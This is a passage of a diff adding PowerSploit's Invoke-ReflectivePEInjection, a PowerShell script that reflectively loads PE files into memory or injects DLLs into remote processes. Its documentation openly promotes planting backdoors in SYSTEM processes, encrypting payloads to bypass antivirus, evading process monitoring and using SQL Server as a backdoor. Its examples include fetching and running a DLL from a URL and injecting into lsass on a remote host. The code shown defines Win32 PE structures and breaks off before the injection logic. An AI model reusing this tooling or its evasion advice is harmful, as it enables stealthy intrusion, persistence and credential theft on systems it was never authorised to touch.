+ This is probably most useful for injecting backdoors in SYSTEM processes in Session0. Currently, you cannot retrieve output
24
+ from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the
25
+ remote process.
26
+
27
+
28
+ While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array
29
+ containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will
30
+ bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba
31
+ blog linked below (thanks to whitey).
32
+
33
+ PowerSploit Function: Invoke-ReflectivePEInjection
34
+ Author: Joe Bialek, Twitter: @JosephBialek
35
+ License: BSD 3-Clause
36
+ Required Dependencies: None
37
+ Optional Dependencies: None
38
+ Version: 1.4
39
+
40
+ .DESCRIPTION
41
+
42
+ Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
43
+
44
+ .PARAMETER PEPath
45
+
46
+ The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer.
47
+
48
+ .PARAMETER PEUrl
49
+
50
+ A URL containing a DLL/EXE to load and execute.
51
+
52
+ .PARAMETER PEBytes
53
+
54
+ A byte array containing a DLL/EXE to load and execute.
55
+
56
+ .PARAMETER ComputerName
57
+
58
+ Optional, an array of computernames to run the script on.
59
+
60
+ .PARAMETER FuncReturnType
61
+
62
+ Optional, the return type of the function being called in the DLL. Default: Void
63
+ Options: String, WString, Void. See notes for more information.
64
+ IMPORTANT: For DLLs being loaded remotely, only Void is supported.
65
+
66
+ .PARAMETER ExeArgs
67
+
68
+ Optional, arguments to pass to the executable being reflectively loaded.
69
+
70
+ .PARAMETER ProcName
71
+
72
+ Optional, the name of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.
73
+
74
+ .PARAMETER ProcId
75
+
76
+ Optional, the process ID of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this.
77
+
78
+ .PARAMETER ForceASLR
79
+
80
+ Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. Some PE's will work with ASLR even
81
+ if the compiler flags don't indicate they support it. Other PE's will simply crash. Make sure to test this prior to using. Has no effect when
82
+ loading in to a remote process.
83
+
84
+ .EXAMPLE
85
+
86
+ Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc().
87
+ Note that the file name on the website can be any file extension.
88
+ Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString
89
+
90
+ .EXAMPLE
91
+
92
+ Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc().
93
+ Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local
94
+
95
+ .EXAMPLE
96
+
97
+ Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print
98
+ the wchar_t* returned by WStringFunc() from all the computers.
99
+ Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)
100
+
101
+ .EXAMPLE
102
+
103
+ Load DemoEXE and run it locally.
104
+ Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4"
105
+
106
+ .EXAMPLE
107
+
108
+ Load DemoEXE and run it locally. Forces ASLR on for the EXE.
109
+ Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR
110
+
111
+ .EXAMPLE
112
+
113
+ Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.
114
+ Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local
115
+
116
+ .EXAMPLE
117
+
118
+ Load a PE from a byte array.
119
+ Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4"
120
+
121
+ .NOTES
122
+ GENERAL NOTES:
123
+ The script has 3 basic sets of functionality:
124
+ 1.) Reflectively load a DLL in to the PowerShell process
125
+ -Can return DLL output to user when run remotely or locally.
126
+ -Cleans up memory in the PS process once the DLL finishes executing.
127
+ -Great for running pentest tools on remote computers without triggering process monitoring alerts.
128
+ -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info.
129
+ 2.) Reflectively load an EXE in to the PowerShell process.
130
+ -Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally.
131
+ -Cleans up memory in the PS process once the DLL finishes executing.
132
+ -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts.
133
+ 3.) Reflectively inject a DLL in to a remote process.
134
+ -Can NOT return DLL output to the user when run remotely OR locally.
135
+ -Does NOT clean up memory in the remote process if/when DLL finishes execution.
136
+ -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory.
137
+ -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded.
138
+
139
+
140
+
141
+ DLL LOADING NOTES:
142
+
143
+ PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output.
144
+ If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL
145
+ return a char* or wchar_t*, which PowerShell can take and read the output from. Anything output from stdout which is run using powershell
146
+ remoting will not be returned to you. If you just run the PowerShell script locally, you WILL be able to see the stdout output from
147
+ applications because it will just appear in the console window. The limitation only applies when using PowerShell remoting.
148
+
149
+ For DLL Loading:
150
+ Once this script loads the DLL, it calls a function in the DLL. There is a section near the bottom labeled "YOUR CODE GOES HERE"
151
+ I recommend your DLL take no parameters. I have prewritten code to handle functions which take no parameters are return
152
+ the following types: char*, wchar_t*, and void. If the function returns char* or wchar_t* the script will output the
153
+ returned data. The FuncReturnType parameter can be used to specify which return type to use. The mapping is as follows:
154
+ wchar_t* : FuncReturnType = WString
155
+ char* : FuncReturnType = String
156
+ void : Default, don't supply a FuncReturnType
157
+
158
+ For the whcar_t* and char_t* options to work, you must allocate the string to the heap. Don't simply convert a string
159
+ using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns.
160
+
161
+ The function name expected in the DLL for the prewritten FuncReturnType's is as follows:
162
+ WString : WStringFunc
163
+ String : StringFunc
164
+ Void : VoidFunc
165
+
166
+ These function names ARE case sensitive. To create an exported DLL function for the wstring type, the function would
167
+ be declared as follows:
168
+ extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
169
+
170
+
171
+ If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify
172
+ this script to accomodate this. You can find the code to modify in the section labeled "YOUR CODE GOES HERE".
173
+
174
+ Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection
175
+
176
+ .LINK
177
+
178
+ Blog: http://clymb3r.wordpress.com/
179
+ Github repo: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection
180
+
181
+ Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/
182
+ Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/
183
+ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/
184
+
185
+ #>
186
+
187
+ [CmdletBinding(DefaultParameterSetName="WebFile")]
188
+ Param(
189
+ [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)]
190
+ [String]
191
+ $PEPath,
192
+
193
+ [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)]
194
+ [ValidateNotNullOrEmpty()]
195
+ [Byte[]]
196
+ $PEBytes,
197
+
198
+ [Parameter(Position = 1)]
199
+ [String[]]
200
+ $ComputerName,
201
+
202
+ [Parameter(Position = 2)]
203
+ [ValidateSet( 'WString', 'String', 'Void' )]
204
+ [String]
205
+ $FuncReturnType = 'Void',
206
+
207
+ [Parameter(Position = 3)]
208
+ [String]
209
+ $ExeArgs,
210
+
211
+ [Parameter(Position = 4)]
212
+ [Int32]
213
+ $ProcId,
214
+
215
+ [Parameter(Position = 5)]
216
+ [String]
217
+ $ProcName,
218
+
219
+ [Parameter(Position = 6)]
220
+ [Switch]
221
+ $ForceASLR,
222
+
223
+ [Parameter(Position = 7)]
224
+ $Credential
225
+ )
226
+
227
+ Set-StrictMode -Version 2
228
+
229
+
230
+ $RemoteScriptBlock = {
231
+ [CmdletBinding()]
232
+ Param(
233
+ [Parameter(Position = 0, Mandatory = $true)]
234
+ [Byte[]]
235
+ $PEBytes,
236
+
237
+ [Parameter(Position = 1, Mandatory = $true)]
238
+ [String]
239
+ $FuncReturnType,
240
+
241
+ [Parameter(Position = 2, Mandatory = $true)]
242
+ [Int32]
243
+ $ProcId,
244
+
245
+ [Parameter(Position = 3, Mandatory = $true)]
246
+ [String]
247
+ $ProcName,
248
+
249
+ [Parameter(Position = 4, Mandatory = $true)]
250
+ [Bool]
251
+ $ForceASLR
252
+ )
253
+
254
+ ###################################
255
+ ########## Win32 Stuff ##########
256
+ ###################################
257
+ Function Get-Win32Types
258
+ {
259
+ $Win32Types = New-Object System.Object
260
+
261
+ #Define all the structures/enums that will be used
262
+ # This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html
263
+ $Domain = [AppDomain]::CurrentDomain
264
+ $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
265
+ $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
266
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
267
+ $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
268
+
269
+
270
+ ############ ENUM ############
271
+ #Enum MachineType
272
+ $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
273
+ $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
274
+ $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
275
+ $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
276
+ $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
277
+ $MachineType = $TypeBuilder.CreateType()
278
+ $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
279
+
280
+ #Enum MagicType
281
+ $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
282
+ $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
283
+ $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
284
+ $MagicType = $TypeBuilder.CreateType()
285
+ $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
286
+
287
+ #Enum SubSystemType
288
+ $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
289
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
290
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
291
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
292
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
293
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
294
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
295
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
296
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
297
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
298
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
299
+ $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
300
+ $SubSystemType = $TypeBuilder.CreateType()
301
+ $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
302
+
303
+ #Enum DllCharacteristicsType
304
+ $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
305
+ $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
306
+ $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
307
+ $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
308
+ $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
309
+ $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
310
+ $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
311
+ $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
312
+ $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
313
+ $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
314
+ $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
315
+ $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
316
+ $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
317
+ $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
318
+ $DllCharacteristicsType = $TypeBuilder.CreateType()
319
+ $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
320
+
321
+ ########### STRUCT ###########
322
+ #Struct IMAGE_DATA_DIRECTORY
323
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
324
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
325
+ ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
326
+ ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
327
+ $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
328
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
329
+
330
+ #Struct IMAGE_FILE_HEADER
331
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
332
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
333
+ $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
334
+ $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
335
+ $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
336
+ $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
337
+ $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
338
+ $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
339
+ $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
340
+ $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
341
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
342
+
343
+ #Struct IMAGE_OPTIONAL_HEADER64
344
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
345
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
346
+ ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
347
+ ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
348
+ ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
349
+ ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
350
+ ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
351
+ ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
352
+ ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
353
+ ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
354
+ ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
355
+ ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
356
+ ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
357
+ ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
358
+ ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
359
+ ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
360
+ ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
361
+ ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
362
+ ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
363
+ ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
364
+ ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
365
+ ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
366
+ ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
367
+ ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
368
+ ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
369
+ ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
370
+ ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
371
+ ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
372
+ ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
373
+ ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
374
+ ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
375
+ ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
376
+ ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
377
+ ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
378
+ ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
379
+ ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
380
+ ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
381
+ ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
382
+ ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
383
+ ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
384
+ ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
385
+ ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
386
+ ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
387
+ ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
388
+ ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
389
+ ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
390
+ ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
391
+ $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
392
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
393
+
394
+ #Struct IMAGE_OPTIONAL_HEADER32
395
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
396
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
397
+ ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
398
+ ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
399
+ ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
400
+ ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
401
+ ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
402
+ ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
403
+ ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
404
+ ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
405
+ ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
406
+ ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
407
+ ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
408
+ ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
409
+ ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
410
+ ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
411
+ ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
412
+ ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
413
+ ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
414
+ ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
415
+ ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
416
+ ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
417
+ ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
418
+ ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
419
+ ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
420
+ ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
421
+ ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
422
+ ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
423
+ ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
424
+ ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
425
+ ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
426
+ ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
427
+ ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
428
+ ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
429
+ ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
430
+ ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
431
+ ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
432
+ ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
433
+ ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
434
+ ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
435
+ ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
436
+ ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
437
+ ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
438
+ ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
439
+ ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
440
+ ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
441
+ ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
442
+ ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
443
+ $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
444
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
445
+
446
+ #Struct IMAGE_NT_HEADERS64
447
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
448
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
449
+ $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
450
+ $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
451
+ $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
452
+ $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
453
+ $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
454
+
455
+ #Struct IMAGE_NT_HEADERS32
456
+ $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
457
+ $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
458
+ $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
459
+ $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
460
+ $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
461
